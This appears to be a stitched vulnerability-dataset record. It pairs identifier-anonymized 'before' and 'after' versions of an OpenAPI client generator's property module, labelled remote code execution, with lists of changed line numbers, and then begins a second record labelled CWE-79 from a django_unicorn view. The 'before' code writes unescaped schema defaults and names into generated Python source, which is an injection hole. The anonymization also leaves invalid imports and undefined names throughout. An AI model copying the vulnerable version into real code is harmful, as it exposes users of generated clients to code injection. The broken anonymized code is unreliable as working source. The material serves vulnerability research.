        return _string_based_property(name=name, required=required, data=data)
    if data.type == "array":
        if data.items is None:
            return PropertyError(data=data, detail="type array must have items defined")
        item_prop = property_from_data(name=f"{name}_item", required=True, data=data.items)
        if isinstance(item_prop, PropertyError):
            return PropertyError(data=item_prop.data, detail=f"invalid data in items of array {name}")
        return ListProperty(name=name, required=required, default=data.default, inner_property=item_prop)

    # Remaining simple types all take identical constructor arguments.
    simple_types = {
        "number": FloatProperty,
        "integer": IntProperty,
        "boolean": BooleanProperty,
        "object": DictProperty,
    }
    if data.type in simple_types:
        return simple_types[data.type](name=name, required=required, default=data.default)
    return PropertyError(data=data, detail=f"unknown type {data.type}")
def property_from_data(
    name: str, required: bool, data: Union[oai.Reference, oai.Schema]
) -> Union[Property, PropertyError]:
    """ Build a Property from schema data, converting default-validation failures into a PropertyError """
    try:
        prop = _property_from_data(name=name, required=required, data=data)
    except ValidationError:
        return PropertyError(detail="Failed to validate default value", data=data)
    return prop
| remote_code_execution | {
"code": [
"from .errors import PropertyError",
" def get_type_string(self) -> str:",
" if self.required:",
" def __post_init__(self) -> None:",
" super().__post_init__()",
" if self.default is not None:",
" self.default = f'\"{self.default}\"'",
" _type_string: ClassVar[str] = \"datetime\"",
" imports.update({\"from datetime import datetime\", \"from typing import cast\"})",
" _type_string: ClassVar[str] = \"date\"",
" imports.update({\"from datetime import date\", \"from typing import cast\"})",
" def __post_init__(self) -> None:",
" super().__post_init__()",
" if self.default is not None:",
" self.default = f\"field(default_factory=lambda: cast({self.get_type_string()}, {self.default}))\"",
" def get_type_string(self) -> str:",
" if self.required:",
" def get_type_string(self) -> str:",
" if self.required:",
" super().__post_init__()",
" inverse_values = {v: k for k, v in self.values.items()}",
" if self.default is not None:",
" self.default = f\"{self.reference.class_name}.{inverse_values[self.default]}\"",
" def get_type_string(self) -> str:",
" if self.required:",
" output[key] = value",
" def get_type_string(self) -> str:",
" if self.required:",
" def __post_init__(self) -> None:",
" super().__post_init__()",
" if self.default is not None:",
" self.default = f\"field(default_factory=lambda: cast({self.get_type_string()}, {self.default}))\"",
"def property_from_data("
],
"line_no": [
8,
36,
38,
77,
78,
79,
80,
89,
100,
108,
119,
175,
176,
177,
178,
180,
182,
209,
213,
245,
256,
257,
258,
271,
274,
301,
319,
321,
349,
350,
351,
352,
384
]
} | {
"code": [
"from datetime import date, datetime",
"from .errors import PropertyError, ValidationError",
" Raises:",
" ValidationError: Raised when the default value fails to be converted to the expected type",
" if self.default is not None:",
" self.default = self._validate_default(default=self.default)",
" def _validate_default(self, default: Any) -> Any:",
" raise ValidationError",
" if self.required or no_optional:",
" return f'\"{utils.remove_string_escapes(default)}\"'",
" imports.update({\"import datetime\", \"from typing import cast\"})",
" def _validate_default(self, default: Any) -> str:",
" try:",
" except (TypeError, ValueError):",
" raise ValidationError",
" _type_string: ClassVar[str] = \"datetime.date\"",
" def _validate_default(self, default: Any) -> str:",
" try:",
" except (TypeError, ValueError) as e:",
" raise ValidationError() from e",
" try:",
" return float(default)",
" raise ValidationError() from e",
" try:",
" except (TypeError, ValueError) as e:",
" def _validate_default(self, default: Any) -> bool:",
" def get_type_string(self, no_optional: bool = False) -> str:",
" if self.required or no_optional:",
" def _validate_default(self, default: Any) -> str:",
" if not isinstance(default, list):",
" default = list(map(self.inner_property._validate_default, default))",
" default = str(default).replace(\"'\", \"\")",
" return f\"field(default_factory=lambda: cast({self.get_type_string()}, {default}))\"",
" def get_type_string(self, no_optional: bool = False) -> str:",
" if self.required or no_optional:",
" for property in self.inner_properties:",
" try:",
" val = property._validate_default(default)",
" except ValidationError:",
" raise ValidationError()",
" super().__post_init__()",
" if self.required or no_optional:",
" sanitized_key = utils.fix_keywords(utils.sanitize(key))",
" output[sanitized_key] = utils.remove_string_escapes(value)",
" inverse_values = {v: k for k, v in self.values.items()}",
" return f\"{self.reference.class_name}.{inverse_values[default]}\"",
" raise ValidationError() from e",
" def get_type_string(self, no_optional: bool = False) -> str:",
" if self.required or no_optional:",
" def _validate_default(self, default: Any) -> Any:",
" enum = EnumProperty.get_enum(self.reference.class_name)",
" if enum:",
" return enum._validate_default(default)",
" else:",
" raise ValidationError",
" template: ClassVar[str] = \"dict_property.pyi\"",
" def _validate_default(self, default: Any) -> str:",
" if isinstance(default, dict):",
" return repr(default)",
" raise ValidationError",
"def _property_from_data(",
" name = utils.remove_string_escapes(name)",
"def property_from_data(",
" name: str, required: bool, data: Union[oai.Reference, oai.Schema]",
") -> Union[Property, PropertyError]:",
" try:",
" return _property_from_data(name=name, required=required, data=data)",
" except ValidationError:",
" return PropertyError(detail=\"Failed to validate default value\", data=data)"
],
"line_no": [
4,
9,
24,
25,
39,
40,
42,
44,
48,
88,
108,
111,
113,
115,
117,
124,
138,
139,
141,
142,
172,
173,
175,
186,
188,
198,
213,
215,
234,
235,
238,
240,
242,
252,
256,
274,
275,
276,
278,
280,
307,
323,
350,
351,
356,
358,
360,
376,
378,
399,
400,
401,
402,
403,
404,
412,
428,
429,
430,
431,
449,
453,
494,
495,
496,
497,
498,
499,
500
]
} | from __future__ import annotations
from dataclasses import InitVar, dataclass, field
from typing import Any, ClassVar, Dict, Generic, List, Optional, Set, TypeVar, Union
from .. import schema as oai
from .. import utils
from .errors import .PropertyError
from .reference import Reference
@dataclass
class CLASS_0:
VAR_1: str
VAR_2: bool
VAR_16: Optional[Any]
FUNC_8: ClassVar[Optional[str]] = None
_type_string: ClassVar[str]
python_name: str = field(init=False)
def __post_init__(self) -> None:
self.python_name = utils.snake_case(self.name)
def FUNC_2(self) -> str:
if self.required:
return self._type_string
return f"Optional[{self._type_string}]"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
if not self.required:
return {"from typing import Optional"}
return set()
def FUNC_4(self) -> str:
if self.default:
VAR_16 = self.default
elif not self.required:
VAR_16 = "None"
else:
VAR_16 = None
if VAR_16 is not None:
return f"{self.python_name}: {self.get_type_string()} = {self.default}"
else:
return f"{self.python_name}: {self.get_type_string()}"
@dataclass
class CLASS_1(CLASS_0):
max_length: Optional[int] = None
pattern: Optional[str] = None
_type_string: ClassVar[str] = "str"
def __post_init__(self) -> None:
super().__post_init__()
if self.default is not None:
self.default = f'"{self.default}"'
@dataclass
class CLASS_2(CLASS_0):
_type_string: ClassVar[str] = "datetime"
FUNC_8: ClassVar[str] = "datetime_property.pyi"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.update({"from datetime import datetime", "from typing import cast"})
return VAR_8
@dataclass
class CLASS_3(CLASS_0):
_type_string: ClassVar[str] = "date"
FUNC_8: ClassVar[str] = "date_property.pyi"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.update({"from datetime import date", "from typing import cast"})
return VAR_8
@dataclass
class CLASS_4(CLASS_0):
_type_string: ClassVar[str] = "File"
FUNC_8: ClassVar[str] = "file_property.pyi"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.update({f"from {VAR_4}.types import File", "from dataclasses import astuple"})
return VAR_8
@dataclass
class CLASS_5(CLASS_0):
VAR_16: Optional[float] = None
_type_string: ClassVar[str] = "float"
@dataclass
class CLASS_6(CLASS_0):
VAR_16: Optional[int] = None
_type_string: ClassVar[str] = "int"
@dataclass
class CLASS_7(CLASS_0):
_type_string: ClassVar[str] = "bool"
VAR_0 = TypeVar("InnerProp", bound=CLASS_0)
@dataclass
class CLASS_8(CLASS_0, Generic[VAR_0]):
inner_property: VAR_0
FUNC_8: ClassVar[str] = "list_property.pyi"
def __post_init__(self) -> None:
super().__post_init__()
if self.default is not None:
self.default = f"field(default_factory=lambda: cast({self.get_type_string()}, {self.default}))"
def FUNC_2(self) -> str:
if self.required:
return f"List[{self.inner_property.get_type_string()}]"
return f"Optional[List[{self.inner_property.get_type_string()}]]"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.update(self.inner_property.get_imports(VAR_4=prefix))
VAR_8.add("from typing import List")
if self.default is not None:
VAR_8.add("from dataclasses import field")
VAR_8.add("from typing import cast")
return VAR_8
@dataclass
class CLASS_9(CLASS_0):
inner_properties: List[CLASS_0]
FUNC_8: ClassVar[str] = "union_property.pyi"
def FUNC_2(self) -> str:
VAR_9 = [p.get_type_string() for p in self.inner_properties]
VAR_10 = ", ".join(VAR_9)
if self.required:
return f"Union[{VAR_10}]"
return f"Optional[Union[{VAR_10}]]"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
for VAR_21 in self.inner_properties:
VAR_8.update(VAR_21.get_imports(VAR_4=prefix))
VAR_8.add("from typing import Union")
return VAR_8
VAR_14: Dict[str, CLASS_10] = {}
@dataclass
class CLASS_10(CLASS_0):
VAR_6: Dict[str, str]
VAR_11: Reference = field(init=False)
VAR_5: InitVar[str]
FUNC_8: ClassVar[str] = "enum_property.pyi"
def __post_init__(self, VAR_5: str) -> None: # type: ignore
super().__post_init__()
VAR_11 = Reference.from_ref(VAR_5)
VAR_12 = 0
while VAR_11.class_name in VAR_14:
VAR_17 = VAR_14[VAR_11.class_name]
if self.values == VAR_17.values:
break # This is the same Enum, we're good
VAR_12 += 1
VAR_11 = Reference.from_ref(f"{VAR_11.class_name}{VAR_12}")
self.reference = VAR_11
VAR_13 = {v: k for k, v in self.values.items()}
if self.default is not None:
self.default = f"{self.reference.class_name}.{VAR_13[self.default]}"
VAR_14[self.reference.class_name] = self
@staticmethod
def FUNC_5() -> Dict[str, CLASS_10]:
return VAR_14
@staticmethod
def FUNC_6(VAR_1: str) -> Optional[CLASS_10]:
return VAR_14.get(VAR_1)
def FUNC_2(self) -> str:
if self.required:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.add(f"from {VAR_4}.{self.reference.module_name} import {self.reference.class_name}")
return VAR_8
@staticmethod
def FUNC_7(VAR_6: List[str]) -> Dict[str, str]:
VAR_18: Dict[str, str] = {}
for i, value in enumerate(VAR_6):
if value[0].isalpha():
VAR_19 = value.upper()
else:
VAR_19 = f"VALUE_{i}"
if VAR_19 in VAR_18:
raise ValueError(f"Duplicate VAR_19 {key} in Enum")
VAR_18[VAR_19] = value
return VAR_18
@dataclass
class CLASS_11(CLASS_0):
VAR_11: Reference
@property
def FUNC_8(self) -> str: # type: ignore
VAR_15 = CLASS_10.get_enum(self.reference.class_name)
if VAR_15:
return "enum_property.pyi"
return "ref_property.pyi"
def FUNC_2(self) -> str:
if self.required:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.update(
{
f"from {VAR_4}.{self.reference.module_name} import {self.reference.class_name}",
"from typing import Dict",
"from typing import cast",
}
)
return VAR_8
@dataclass
class CLASS_12(CLASS_0):
_type_string: ClassVar[str] = "Dict[Any, Any]"
def __post_init__(self) -> None:
super().__post_init__()
if self.default is not None:
self.default = f"field(default_factory=lambda: cast({self.get_type_string()}, {self.default}))"
def FUNC_3(self, *, VAR_4: str) -> Set[str]:
VAR_8 = super().get_imports(VAR_4=prefix)
VAR_8.add("from typing import Dict")
if self.default is not None:
VAR_8.add("from dataclasses import field")
VAR_8.add("from typing import cast")
return VAR_8
def FUNC_0(
VAR_1: str, VAR_2: bool, VAR_3: oai.Schema
) -> Union[CLASS_1, CLASS_3, CLASS_2, CLASS_4]:
VAR_7 = VAR_3.schema_format
if VAR_7 == "date-time":
return CLASS_2(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default)
elif VAR_7 == "date":
return CLASS_3(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default)
elif VAR_7 == "binary":
return CLASS_4(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default)
else:
return CLASS_1(VAR_1=name, VAR_16=VAR_3.default, VAR_2=required, pattern=VAR_3.pattern)
def FUNC_1(
VAR_1: str, VAR_2: bool, VAR_3: Union[oai.Reference, oai.Schema]
) -> Union[CLASS_0, PropertyError]:
if isinstance(VAR_3, oai.Reference):
return CLASS_11(VAR_1=name, VAR_2=required, VAR_11=Reference.from_ref(VAR_3.ref), VAR_16=None)
if VAR_3.enum:
return CLASS_10(
VAR_1=name,
VAR_2=required,
VAR_6=CLASS_10.values_from_list(VAR_3.enum),
VAR_5=VAR_3.title or VAR_1,
VAR_16=VAR_3.default,
)
if VAR_3.anyOf:
sub_properties: List[CLASS_0] = []
for sub_prop_data in VAR_3.anyOf:
VAR_20 = FUNC_1(VAR_1=name, VAR_2=required, VAR_3=sub_prop_data)
if isinstance(VAR_20, PropertyError):
return PropertyError(detail=f"Invalid property in union {VAR_1}", VAR_3=sub_prop_data)
sub_properties.append(VAR_20)
return CLASS_9(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default, inner_properties=sub_properties)
if not VAR_3.type:
return PropertyError(VAR_3=data, detail="Schemas must either have one of VAR_15, anyOf, or type defined.")
if VAR_3.type == "string":
return FUNC_0(VAR_1=name, VAR_2=required, VAR_3=data)
elif VAR_3.type == "number":
return CLASS_5(VAR_1=name, VAR_16=VAR_3.default, VAR_2=required)
elif VAR_3.type == "integer":
return CLASS_6(VAR_1=name, VAR_16=VAR_3.default, VAR_2=required)
elif VAR_3.type == "boolean":
return CLASS_7(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default)
elif VAR_3.type == "array":
if VAR_3.items is None:
return PropertyError(VAR_3=data, detail="type array must have items defined")
VAR_21 = FUNC_1(VAR_1=f"{VAR_1}_item", VAR_2=True, VAR_3=VAR_3.items)
if isinstance(VAR_21, PropertyError):
return PropertyError(VAR_3=VAR_21.data, detail=f"invalid VAR_3 in items of array {VAR_1}")
return CLASS_8(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default, inner_property=VAR_21,)
elif VAR_3.type == "object":
return CLASS_12(VAR_1=name, VAR_2=required, VAR_16=VAR_3.default)
return PropertyError(VAR_3=data, detail=f"unknown type {VAR_3.type}")
| from __future__ import annotations
from dataclasses import InitVar, dataclass, field
from datetime import date, datetime
from typing import Any, ClassVar, Dict, Generic, List, Optional, Set, TypeVar, Union
from .. import schema as oai
from .. import utils
from .errors import .PropertyError, ValidationError
from .reference import Reference
@dataclass
class CLASS_0:
VAR_1: str
VAR_2: bool
VAR_4: Optional[Any]
FUNC_10: ClassVar[Optional[str]] = None
_type_string: ClassVar[str]
python_name: str = field(init=False)
def __post_init__(self) -> None:
self.python_name = utils.snake_case(self.name)
if self.default is not None:
self.default = self._validate_default(VAR_4=self.default)
def FUNC_3(self, VAR_4: Any) -> Any:
raise ValidationError
def FUNC_4(self, VAR_5: bool = False) -> str:
if self.required or VAR_5:
return self._type_string
return f"Optional[{self._type_string}]"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
if not self.required:
return {"from typing import Optional"}
return set()
def FUNC_6(self) -> str:
if self.default:
VAR_4 = self.default
elif not self.required:
VAR_4 = "None"
else:
VAR_4 = None
if VAR_4 is not None:
return f"{self.python_name}: {self.get_type_string()} = {self.default}"
else:
return f"{self.python_name}: {self.get_type_string()}"
@dataclass
class CLASS_1(CLASS_0):
max_length: Optional[int] = None
pattern: Optional[str] = None
_type_string: ClassVar[str] = "str"
def FUNC_3(self, VAR_4: Any) -> str:
return f'"{utils.remove_string_escapes(VAR_4)}"'
@dataclass
class CLASS_2(CLASS_0):
_type_string: ClassVar[str] = "datetime.datetime"
FUNC_10: ClassVar[str] = "datetime_property.pyi"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.update({"import datetime", "from typing import cast"})
return VAR_10
def FUNC_3(self, VAR_4: Any) -> str:
for format_string in ("%Y-%m-%dT%H:%M:%S", "%Y-%m-%dT%H:%M:%S%z"):
try:
return repr(datetime.strptime(VAR_4, format_string))
except (TypeError, ValueError):
continue
raise ValidationError
@dataclass
class CLASS_3(CLASS_0):
_type_string: ClassVar[str] = "datetime.date"
FUNC_10: ClassVar[str] = "date_property.pyi"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.update({"import datetime", "from typing import cast"})
return VAR_10
def FUNC_3(self, VAR_4: Any) -> str:
try:
return repr(date.fromisoformat(VAR_4))
except (TypeError, ValueError) as e:
raise ValidationError() from e
@dataclass
class CLASS_4(CLASS_0):
_type_string: ClassVar[str] = "File"
FUNC_10: ClassVar[str] = "file_property.pyi"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.update({f"from {VAR_6}.types import File", "from dataclasses import astuple"})
return VAR_10
@dataclass
class CLASS_5(CLASS_0):
VAR_4: Optional[float] = None
_type_string: ClassVar[str] = "float"
def FUNC_3(self, VAR_4: Any) -> float:
try:
return float(VAR_4)
except (TypeError, ValueError) as e:
raise ValidationError() from e
@dataclass
class CLASS_6(CLASS_0):
VAR_4: Optional[int] = None
_type_string: ClassVar[str] = "int"
def FUNC_3(self, VAR_4: Any) -> int:
try:
return int(VAR_4)
except (TypeError, ValueError) as e:
raise ValidationError() from e
@dataclass
class CLASS_7(CLASS_0):
_type_string: ClassVar[str] = "bool"
def FUNC_3(self, VAR_4: Any) -> bool:
return bool(VAR_4)
VAR_0 = TypeVar("InnerProp", bound=CLASS_0)
@dataclass
class CLASS_8(CLASS_0, Generic[VAR_0]):
inner_property: VAR_0
FUNC_10: ClassVar[str] = "list_property.pyi"
def FUNC_4(self, VAR_5: bool = False) -> str:
if self.required or VAR_5:
return f"List[{self.inner_property.get_type_string()}]"
return f"Optional[List[{self.inner_property.get_type_string()}]]"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.update(self.inner_property.get_imports(VAR_6=prefix))
VAR_10.add("from typing import List")
if self.default is not None:
VAR_10.add("from dataclasses import field")
VAR_10.add("from typing import cast")
return VAR_10
def FUNC_3(self, VAR_4: Any) -> str:
if not isinstance(VAR_4, list):
raise ValidationError()
VAR_4 = list(map(self.inner_property._validate_default, VAR_4))
if isinstance(self.inner_property, CLASS_11): # Fix enums to use the actual value
VAR_4 = str(VAR_4).replace("'", "")
return f"field(default_factory=lambda: cast({self.get_type_string()}, {VAR_4}))"
@dataclass
class CLASS_9(CLASS_0):
inner_properties: List[CLASS_0]
FUNC_10: ClassVar[str] = "union_property.pyi"
def FUNC_4(self, VAR_5: bool = False) -> str:
VAR_11 = [p.get_type_string() for p in self.inner_properties]
VAR_12 = ", ".join(VAR_11)
if self.required or VAR_5:
return f"Union[{VAR_12}]"
return f"Optional[Union[{VAR_12}]]"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
for VAR_24 in self.inner_properties:
VAR_10.update(VAR_24.get_imports(VAR_6=prefix))
VAR_10.add("from typing import Union")
return VAR_10
def FUNC_3(self, VAR_4: Any) -> Any:
for property in self.inner_properties:
try:
VAR_22 = property._validate_default(VAR_4)
return VAR_22
except ValidationError:
continue
raise ValidationError()
VAR_15: Dict[str, CLASS_10] = {}
@dataclass
class CLASS_10(CLASS_0):
VAR_8: Dict[str, str]
VAR_13: Reference = field(init=False)
VAR_7: InitVar[str]
FUNC_10: ClassVar[str] = "enum_property.pyi"
def __post_init__(self, VAR_7: str) -> None: # type: ignore
VAR_13 = Reference.from_ref(VAR_7)
VAR_14 = 0
while VAR_13.class_name in VAR_15:
VAR_18 = VAR_15[VAR_13.class_name]
if self.values == VAR_18.values:
break # This is the same Enum, we're good
VAR_14 += 1
VAR_13 = Reference.from_ref(f"{VAR_13.class_name}{VAR_14}")
self.reference = VAR_13
super().__post_init__()
VAR_15[self.reference.class_name] = self
@staticmethod
def FUNC_7() -> Dict[str, CLASS_10]:
return VAR_15
@staticmethod
def FUNC_8(VAR_1: str) -> Optional[CLASS_10]:
return VAR_15.get(VAR_1)
def FUNC_4(self, VAR_5: bool = False) -> str:
if self.required or VAR_5:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.add(f"from {VAR_6}.{self.reference.module_name} import {self.reference.class_name}")
return VAR_10
@staticmethod
def FUNC_9(VAR_8: List[str]) -> Dict[str, str]:
VAR_20: Dict[str, str] = {}
for i, value in enumerate(VAR_8):
if value[0].isalpha():
VAR_23 = value.upper()
else:
VAR_23 = f"VALUE_{i}"
if VAR_23 in VAR_20:
raise ValueError(f"Duplicate VAR_23 {key} in Enum")
VAR_19 = utils.fix_keywords(utils.sanitize(VAR_23))
VAR_20[VAR_19] = utils.remove_string_escapes(value)
return VAR_20
def FUNC_3(self, VAR_4: Any) -> str:
VAR_16 = {v: k for k, v in self.values.items()}
try:
return f"{self.reference.class_name}.{VAR_16[VAR_4]}"
except KeyError as e:
raise ValidationError() from e
@dataclass
class CLASS_11(CLASS_0):
VAR_13: Reference
@property
def FUNC_10(self) -> str: # type: ignore
VAR_17 = CLASS_10.get_enum(self.reference.class_name)
if VAR_17:
return "enum_property.pyi"
return "ref_property.pyi"
def FUNC_4(self, VAR_5: bool = False) -> str:
if self.required or VAR_5:
return self.reference.class_name
return f"Optional[{self.reference.class_name}]"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.update(
{
f"from {VAR_6}.{self.reference.module_name} import {self.reference.class_name}",
"from typing import Dict",
"from typing import cast",
}
)
return VAR_10
def FUNC_3(self, VAR_4: Any) -> Any:
VAR_17 = CLASS_10.get_enum(self.reference.class_name)
if VAR_17:
return VAR_17._validate_default(VAR_4)
else:
raise ValidationError
@dataclass
class CLASS_12(CLASS_0):
_type_string: ClassVar[str] = "Dict[Any, Any]"
FUNC_10: ClassVar[str] = "dict_property.pyi"
def FUNC_5(self, *, VAR_6: str) -> Set[str]:
VAR_10 = super().get_imports(VAR_6=prefix)
VAR_10.add("from typing import Dict")
if self.default is not None:
VAR_10.add("from dataclasses import field")
VAR_10.add("from typing import cast")
return VAR_10
def FUNC_3(self, VAR_4: Any) -> str:
if isinstance(VAR_4, dict):
return repr(VAR_4)
raise ValidationError
def FUNC_0(
VAR_1: str, VAR_2: bool, VAR_3: oai.Schema
) -> Union[CLASS_1, CLASS_3, CLASS_2, CLASS_4]:
VAR_9 = VAR_3.schema_format
if VAR_9 == "date-time":
return CLASS_2(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default)
elif VAR_9 == "date":
return CLASS_3(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default)
elif VAR_9 == "binary":
return CLASS_4(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default)
else:
return CLASS_1(VAR_1=name, VAR_4=VAR_3.default, VAR_2=required, pattern=VAR_3.pattern)
def FUNC_1(
VAR_1: str, VAR_2: bool, VAR_3: Union[oai.Reference, oai.Schema]
) -> Union[CLASS_0, PropertyError]:
VAR_1 = utils.remove_string_escapes(VAR_1)
if isinstance(VAR_3, oai.Reference):
return CLASS_11(VAR_1=name, VAR_2=required, VAR_13=Reference.from_ref(VAR_3.ref), VAR_4=None)
if VAR_3.enum:
return CLASS_10(
VAR_1=name,
VAR_2=required,
VAR_8=CLASS_10.values_from_list(VAR_3.enum),
VAR_7=VAR_3.title or VAR_1,
VAR_4=VAR_3.default,
)
if VAR_3.anyOf:
sub_properties: List[CLASS_0] = []
for sub_prop_data in VAR_3.anyOf:
VAR_21 = FUNC_2(VAR_1=name, VAR_2=required, VAR_3=sub_prop_data)
if isinstance(VAR_21, PropertyError):
return PropertyError(detail=f"Invalid property in union {VAR_1}", VAR_3=sub_prop_data)
sub_properties.append(VAR_21)
return CLASS_9(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default, inner_properties=sub_properties)
if not VAR_3.type:
return PropertyError(VAR_3=data, detail="Schemas must either have one of VAR_17, anyOf, or type defined.")
if VAR_3.type == "string":
return FUNC_0(VAR_1=name, VAR_2=required, VAR_3=data)
elif VAR_3.type == "number":
return CLASS_5(VAR_1=name, VAR_4=VAR_3.default, VAR_2=required)
elif VAR_3.type == "integer":
return CLASS_6(VAR_1=name, VAR_4=VAR_3.default, VAR_2=required)
elif VAR_3.type == "boolean":
return CLASS_7(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default)
elif VAR_3.type == "array":
if VAR_3.items is None:
return PropertyError(VAR_3=data, detail="type array must have items defined")
VAR_24 = FUNC_2(VAR_1=f"{VAR_1}_item", VAR_2=True, VAR_3=VAR_3.items)
if isinstance(VAR_24, PropertyError):
return PropertyError(VAR_3=VAR_24.data, detail=f"invalid VAR_3 in items of array {VAR_1}")
return CLASS_8(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default, inner_property=VAR_24,)
elif VAR_3.type == "object":
return CLASS_12(VAR_1=name, VAR_2=required, VAR_4=VAR_3.default)
return PropertyError(VAR_3=data, detail=f"unknown type {VAR_3.type}")
def FUNC_2(
VAR_1: str, VAR_2: bool, VAR_3: Union[oai.Reference, oai.Schema]
) -> Union[CLASS_0, PropertyError]:
try:
return FUNC_1(VAR_1=name, VAR_2=required, VAR_3=data)
except ValidationError:
return PropertyError(detail="Failed to validate VAR_4 value", VAR_3=data)
| [
2,
5,
10,
11,
16,
23,
27,
30,
32,
35,
41,
45,
52,
61,
66,
67,
71,
74,
76,
81,
82,
88,
91,
95,
102,
103,
107,
110,
114,
121,
122,
126,
129,
133,
140,
141,
145,
148,
149,
153,
156,
157,
161,
163,
164,
166,
167,
171,
174,
179,
185,
189,
200,
201,
205,
208,
216,
220,
229,
230,
232,
233,
237,
241,
243,
254,
260,
265,
270,
273,
277,
281,
288,
293,
302,
304,
305,
309,
311,
318,
324,
328,
341,
342,
346,
348,
353,
357,
367,
368,
382,
383,
426,
14,
15,
16,
17,
18,
19,
20,
21,
22,
70,
85,
86,
87,
106,
125,
144,
152,
160,
170,
204,
236,
308,
345,
372,
387,
37,
43,
44,
45,
46,
47,
48,
54,
93,
94,
95,
96,
97,
98,
112,
113,
114,
115,
116,
117,
131,
132,
133,
134,
135,
136,
181,
187,
188,
189,
190,
191,
192,
210,
218,
219,
220,
221,
222,
223,
263,
268,
272,
279,
280,
281,
282,
283,
284,
291,
320,
326,
327,
328,
329,
330,
331,
355,
356,
357,
358,
359,
360
] | [
2,
6,
11,
12,
17,
23,
27,
31,
34,
36,
41,
45,
51,
55,
62,
71,
76,
77,
81,
84,
86,
89,
90,
96,
99,
103,
110,
118,
119,
123,
126,
130,
137,
143,
144,
148,
151,
155,
162,
163,
167,
170,
176,
177,
181,
184,
190,
191,
195,
197,
199,
201,
202,
204,
205,
209,
212,
218,
222,
233,
237,
241,
243,
244,
248,
251,
259,
263,
272,
281,
282,
284,
285,
289,
293,
295,
305,
309,
314,
319,
322,
326,
330,
337,
342,
352,
354,
361,
362,
366,
368,
375,
381,
385,
398,
405,
406,
410,
413,
417,
427,
432,
433,
447,
448,
492,
493,
501,
15,
16,
17,
18,
19,
20,
21,
22,
23,
24,
25,
26,
80,
93,
94,
95,
122,
147,
166,
180,
194,
208,
247,
288,
365,
409,
437,
452,
43,
47,
53,
54,
55,
56,
57,
58,
64,
101,
102,
103,
104,
105,
106,
128,
129,
130,
131,
132,
133,
153,
154,
155,
156,
157,
158,
214,
220,
221,
222,
223,
224,
225,
253,
261,
262,
263,
264,
265,
266,
312,
317,
321,
328,
329,
330,
331,
332,
333,
340,
377,
383,
384,
385,
386,
387,
388,
415,
416,
417,
418,
419,
420
] |
1CWE-79
| import copy
import logging
from functools import wraps
from typing import Dict
from django.core.cache import caches
from django.http import HttpRequest, JsonResponse
from django.http.response import HttpResponseNotModified
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.http import require_POST
import orjson
from bs4 import BeautifulSoup
from django_unicorn.components import UnicornView
from django_unicorn.components.unicorn_template_response import get_root_element
from django_unicorn.decorators import timed
from django_unicorn.errors import RenderNotModified, UnicornCacheError, UnicornViewError
from django_unicorn.serializer import dumps, loads
from django_unicorn.settings import (
get_cache_alias,
get_serial_enabled,
get_serial_timeout,
)
from django_unicorn.utils import generate_checksum, get_cacheable_component
from django_unicorn.views.action_parsers import call_method, sync_input
from django_unicorn.views.objects import ComponentRequest
from django_unicorn.views.utils import set_property_from_data
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
def handle_error(view_func):
"""
Returns a JSON response with an error if necessary.
"""
def wrapped_view(*args, **kwargs):
try:
return view_func(*args, **kwargs)
except UnicornViewError as e:
return JsonResponse({"error": str(e)})
except RenderNotModified:
return HttpResponseNotModified()
except AssertionError as e:
return JsonResponse({"error": str(e)})
return wraps(view_func)(wrapped_view)
def _process_component_request(
request: HttpRequest, component_request: ComponentRequest
) -> Dict:
"""
Process a `ComponentRequest`:
1. construct a Component view
2. set all of the properties on the view from the data
3. execute the type
- update the properties based on the payload for "syncInput"
- call the method specified for "callMethod"
4. validate any fields specified in a Django form
5. construct a `dict` that will get returned in a `JsonResponse` later on
Args:
param request: HttpRequest for the function-based view.
param: component_request: Component request to process.
Returns:
`dict` with the following structure:
{
"id": component_id,
"dom": html, // re-rendered version of the component after actions in the payload are completed
"data": {}, // updated data after actions in the payload are completed
"errors": {}, // form validation errors
"return": {}, // optional return value from an executed action
"parent": {}, // optional representation of the parent component
}
"""
component = UnicornView.create(
component_id=component_request.id,
component_name=component_request.name,
request=request,
)
